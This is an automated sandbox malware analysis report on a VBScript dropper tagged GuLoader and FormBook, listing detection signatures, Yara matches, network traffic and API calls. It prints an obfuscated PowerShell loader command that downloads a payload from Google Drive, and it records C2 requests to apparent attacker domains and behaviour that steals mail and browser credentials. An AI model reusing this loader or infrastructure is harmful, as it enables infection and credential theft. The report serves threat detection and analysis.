Windows Analysis Report
PO 26519PZ F30 59.vbs

Overview

General Information

Sample name: PO 26519PZ F30 59.vbs
Analysis ID: 1430127
MD5: 1e505992c6f53c34813238451ce858dd
SHA1: 1c4af804deb08c146c619964e4ec40ac8454945f
SHA256: 9e48a5d7e886597d49f7a161a55a101b5735ab7fd829dc62d7b854e0a0fb071b
Tags: GuLoader, vbs

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: PO 26519PZ F30 59.vbs ReversingLabs: Detection: 18%
Source: Yara match File source: 0000000D.00000002.3363239692.0000000000A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3363165345.0000000000A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3362865159.0000000000F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3362030943.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2770587848.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2786483516.0000000020E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3363499558.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: unknown HTTPS traffic detected: 142.250.81.238:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.65.225:443 -> 192.168.2.6:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.81.238:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.65.225:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2595475474.0000000007079000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000B.00000003.2681714587.000000001FF3E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.2786126386.00000000200F0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: ore.pdb0 source: powershell.exe, 00000005.00000002.2595475474.000000000714B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000B.00000003.2681714587.000000001FF3E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.2786126386.00000000200F0000.00000040.00001000.00020000.00000000.sdmp, icacls.exe
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2599815914.0000000007F00000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbn source: powershell.exe, 00000005.00000002.2595475474.000000000714B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb/y source: powershell.exe, 00000005.00000002.2599815914.0000000007F00000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.2584189007.0000000002BC7000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003AB130 FindFirstFileW,FindNextFileW,FindClose, 13_2_003AB130

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\icacls.exe Code function: 4x nop then xor eax, eax 13_2_003990E0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 4x nop then pop edi 13_2_0039D4A0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 4x nop then pop edi 13_2_003A16E4
Source: Joe Sandbox View IP Address: 91.195.240.117 91.195.240.117
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1ysXSWck_shfsiVSvx1UkpRU2R4FJ7k8Z HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1ysXSWck_shfsiVSvx1UkpRU2R4FJ7k8Z&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1ZtB6Y93LGEJ7_RwEY2omVZFUmspULlYQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1ZtB6Y93LGEJ7_RwEY2omVZFUmspULlYQ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bnz5/?0TFT4=uPhDJ26p&OLTx7p=4BEdEKurUNEFwkFRegiDBzC7pj7sTtT0kB0gdoDHo+aBzggPclQDQJqF4ehpSB3lBDvuZzIzoYk2h0Zy/GWQVTCjZfM+P/Gg1ZlgpbDGRDiHo+BBw02A4+u5sqR3NAzj+twq1/A= HTTP/1.1Host: www.elysiangame.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic HTTP traffic detected: GET /bnz5/?OLTx7p=Z7N7hXY/vxItmyrXNQB4LENYEQnuSZ4/X1tSw0B7uFqoJtXe6IwXeXQiXEM/Xr4/ado0xvKOz5lKhVT9TZmVF0n4DqYSIgGlD+rIwihPR/pSypoeDE6i9dqJvHBXbQcbaAkLZ9U=&0TFT4=uPhDJ26p HTTP/1.1Host: www.blueberry-breeze.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: unknown HTTP traffic detected: POST /bnz5/ HTTP/1.1Host: www.blueberry-breeze.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cache-Control: max-age=0Connection: closeContent-Length: 211Content-Type: application/x-www-form-urlencodedOrigin: http://www.blueberry-breeze.comReferer: http://www.blueberry-breeze.com/bnz5/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Data Raw: 4f 4c 54 78 37 70 3d 55 35 6c 62 69 67 4d 2f 6c 7a 59 54 71 47 57 71 4b 52 39 63 50 68 6c 78 45 6c 32 55 63 35 41 6d 62 46 70 65 36 33 34 32 6a 31 47 6e 4d 4e 66 75 78 76 77 4a 57 6b 46 2b 49 6b 6b 6a 66 76 67 39 52 74 41 67 6b 71 4f 57 6e 59 35 72 68 55 54 2f 63 63 76 78 50 45 62 31 57 2f 55 68 55 31 71 44 48 38 2b 48 37 6d 4d 64 65 38 5a 4c 32 36 41 51 59 30 76 74 68 50 71 34 6a 45 64 31 44 78 63 41 57 48 34 34 55 72 6b 79 31 52 6b 70 44 66 4c 63 33 31 31 74 6e 65 52 4e 6c 72 30 7a 63 6c 5a 65 59 4a 4d 50 69 4b 35 44 6a 50 47 57 74 67 6a 2b 55 41 5a 64 48 52 79 41 6e 37 47 4b 62 31 4a 63 2f 54 4e 47 67 57 2f 6b 58 6e 77 31 Data Ascii: OLTx7p=U5lbigM/lzYTqGWqKR9cPhlxEl2Uc5AmbFpe6342j1GnMNfuxvwJWkF+Ikkjfvg9RtAgkqOWnY5rhUT/ccvxPEb1W/UhU1qDH8+H7mMde8ZL26AQY0vthPq4jEd1DxcAWH44Urky1RkpDfLc311tneRNlr0zclZeYJMPiK5DjPGWtgj+UAZdHRyAn7GKb1Jc/TNGgW/kXnw1
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 23 Apr 2024 06:03:56 GMTserver: LiteSpeedvary: User-Agent
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Apr 2024 06:04:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: *Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,TokenContent-Encoding: gzipData Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Apr 2024 06:04:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: *Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,TokenContent-Encoding: gzipData Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Apr 2024 06:04:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: *Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,TokenContent-Encoding: gzipData Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
Source: wscript.exe, 00000000.00000003.2096056521.0000020D14890000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097104839.0000020D148F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000003.2085623443.0000020D16700000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2084178129.0000020D16700000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2096056521.0000020D14890000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085148892.0000020D16700000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097104839.0000020D148F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097824622.0000020D16990000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.2085047456.0000020D169C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085846697.0000020D169E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?87df90f520ad2
Source: wscript.exe, 00000000.00000003.2085047456.0000020D169C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085846697.0000020D169E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?87df90f520
Source: powershell.exe, 00000002.00000002.2642083150.0000015681DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.2642083150.0000015681DEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2709902493.000001569006C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2590325281.0000000005534000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2585121472.0000000004627000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2642083150.0000015680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2585121472.00000000044D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2585121472.0000000004627000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2642083150.0000015680001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2585121472.00000000044D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2642083150.0000015681DD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000005.00000002.2590325281.0000000005534000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2590325281.0000000005534000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2590325281.0000000005534000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2642083150.0000015681DAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000002.00000002.2642083150.0000015681CF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2642083150.0000015680227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: wab.exe, 0000000B.00000002.2772002639.0000000004367000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: wab.exe, 0000000B.00000002.2772002639.0000000004367000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/;
Source: wab.exe, 0000000B.00000002.2772002639.00000000043A2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.2772002639.0000000004367000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1ZtB6Y93LGEJ7_RwEY2omVZFUmspULlYQ
Source: wab.exe, 0000000B.00000002.2772002639.00000000043A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1ZtB6Y93LGEJ7_RwEY2omVZFUmspULlYQ.
Source: powershell.exe, 00000002.00000002.2642083150.0000015680227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1ysXSWck_shfsiVSvx1UkpRU2R4FJ7k8ZP
Source: powershell.exe, 00000005.00000002.2585121472.0000000004627000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1ysXSWck_shfsiVSvx1UkpRU2R4FJ7k8ZXR
Source: powershell.exe, 00000002.00000002.2642083150.0000015681DD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000002.00000002.2642083150.000001568048E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2642083150.0000015681DD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: wab.exe, 0000000B.00000003.2679849857.00000000043D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: wab.exe, 0000000B.00000003.2679849857.00000000043D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/W
Source: wab.exe, 0000000B.00000003.2679787209.00000000043BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1ZtB6Y93LGEJ7_RwEY2omVZFUmspULlYQ&export=download
Source: powershell.exe, 00000002.00000002.2642083150.000001568048E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2642083150.0000015681DD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1ysXSWck_shfsiVSvx1UkpRU2R4FJ7k8Z&export=download
Source: powershell.exe, 00000005.00000002.2585121472.0000000004627000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2642083150.000001568145A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2709902493.000001569006C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2590325281.0000000005534000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2642083150.0000015681DD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.2642083150.0000015681DD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2642083150.000001568048A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2642083150.0000015681DD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.2642083150.0000015681DD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.2642083150.0000015681DD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.2642083150.0000015681DD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2642083150.000001568048A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2642083150.0000015681DD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701

E-Banking Fraud


System Summary

Source: amsi32_4328.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 0000000D.00000002.3363239692.0000000000A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.3363165345.0000000000A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.3362865159.0000000000F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.3362030943.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2770587848.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2786483516.0000000020E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.3363499558.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 1424, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4328, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6539
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6539
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function Nepotistic($Mistnkeligt){$Conchuela=$Mistnkeligt.Length-$Spleniform225;For($Autometamorphosis=5; $Autometamorphosis -lt $Conchuela; $Autometamorphosis+=(6)){$Aversioners+=$Mistnkeligt.$Figurskaaret.Invoke($Autometamorphosis, $Spleniform225);}$Aversioners;}function Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHabudsViv,e AboriNAartuTChae. Bekos1Babit0Kmpen.Inarm0 Mono;Dokum InnhoWbegrdiSkrydn,riva6 Bege4Sundh; Diag BenegxOvers6.umss4Sedim;Al id umbrOmforvOutwe:Stunt1Towns2Riddi1 ,osi.Spise0Dalc ) I,du UnintGE.itueDaakac Koffk KnigoCircu/,lnsn2.ount0Paahi1infur0 Effe0catal1udmat0D,wry1For o TeleFB,udbiUdst,r FormePart fKuponoduplixRedni/Part.1P.stn2 Slau1 Lase.Nonec0Milie ';$Bombiccite240=Nepotistic ' PdatURekursVarieeTriumrSmitt- FinfALog.egMisape P,ctnDomest Stor ';$Charger=Nepotistic ' uffohTest t Stent GranpLnmodsKa.to:rekto/Marli/Omnitd Uvilr Depridelsivanhugeves,i.BeirugColl o madro KlokgBeriglTeleuePun.i. Brysc H.tpo lempmSkeed/ Famiu,alsscSh pp?TungteMbelpxNicetptufteoPerivr E entCleme=Ana.sdTr,ldo Snknw Drean NonclD stooproviaLucradGo,sf&U.wraiDistodHindu=verse1Lakmuy Ber,sEmilsXM.rioS .nylWProgrc UgelkSi.de_ Bares p tihGobblf Jac,s V,riiDi stVBagerSI.nijvDuffbxVelv.1SlageUSit,sk UrolpPrintRTetraU Tyfu2VideoRSc,ot4VelarF Sa,kJTvrsk7 AfnakInscr8DemonZBenin ';$Indtgters=Nepotistic 'Aummb>Overe ';$grazable=Nepotistic 'NematiRe ule Yv rxHas.e ';$Skatteprocenters = Nepotistic 'SynsfeSmertcMytolh ManioPostb syste% Undea Skr pRlighpProcedG.umpa KbentSim laBioni%Socia\MenueU R tmd NorijWheezvOkto,nTurbueMonot. 
BahrMSubstaSymboi Fo k .ill&Pl,dg&Basar ObdureKur,ucTailbhHymenoCzari Ansig$Stil, ';Enrens (Nepotistic 'Josua$Um,akgGenialprevooCent.bDir.saTrdokl Gang: imalUalternKaithcdalevaWaltzvAa ele,gterranklanReheaoDispeuMontas Y arlBuffeyGlot.=Aften( Outgc IndemDagpld Co.p ,isav/EoniacPlagi .rek$StemmSBeredkLjendaSkrmmt.ormitVapo.eCentipOpsmnr eninoSubmicUnsules aglnSchultDesceeNedblrAnthrsF,uep) Lept ');Enrens (Nepotistic 'Selvs$TaarngPrerelUn.wioTeatebGall,aS atkl,dslu:ForbeS M notD stauFor efstinkf intriTentlnunseneFaglrsFikses Grim=Zaddi$ TempC B,reh BalaaThimbrLednig PerqeAcridr nexp.Serassfi.kapInvarlProbliBe,ent,aris(Venog$BacteI tligngabardAbandtJa,nig Horot.ndele CharrDi.gnsMydri)P.dic ');$Charger=$Stuffiness[0];Enrens (Nepotistic 'Tornf$ Palpg,paltlPreatoSp.llbcarp.a ,rtllSamvi:F,rvaFThundrKap taCemetndi,dlkStokklVarebiIntran Int,=RedseN ViceeBoligwDiarb-,latwOBamsebOmbytjNonsyeForlncVal.otStrea OverrSArnauy KulksImmuttJordreFr nkmBeren.UninwNStoreeKa ketTnger.Ep,grWOver,eOplgnbregenC Lr,ilNu,rei TroseTrompnBargetToles ');Enrens (Nepotistic ' Ovip$F.rmaFTrekorPett aKor enUnstokEndo,lAndefi ,aranStren.sta
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201635C0 NtCreateMutant,LdrInitializeThunk, 11_2_201635C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162C70 NtFreeVirtualMemory,LdrInitializeThunk, 11_2_20162C70
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162DF0 NtQuerySystemInformation,LdrInitializeThunk, 11_2_20162DF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20163010 NtOpenDirectoryObject, 11_2_20163010
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20163090 NtSetValueKey, 11_2_20163090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20164340 NtSetContextThread, 11_2_20164340
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20164650 NtSuspendThread, 11_2_20164650
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201639B0 NtGetContextThread, 11_2_201639B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162AB0 NtWaitForSingleObject, 11_2_20162AB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162AD0 NtReadFile, 11_2_20162AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162AF0 NtWriteFile, 11_2_20162AF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162B60 NtClose, 11_2_20162B60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162B80 NtQueryInformationFile, 11_2_20162B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162BA0 NtEnumerateValueKey, 11_2_20162BA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162BF0 NtAllocateVirtualMemory, 11_2_20162BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162BE0 NtQueryValueKey, 11_2_20162BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162C00 NtQueryInformationProcess, 11_2_20162C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162C60 NtCreateKey, 11_2_20162C60
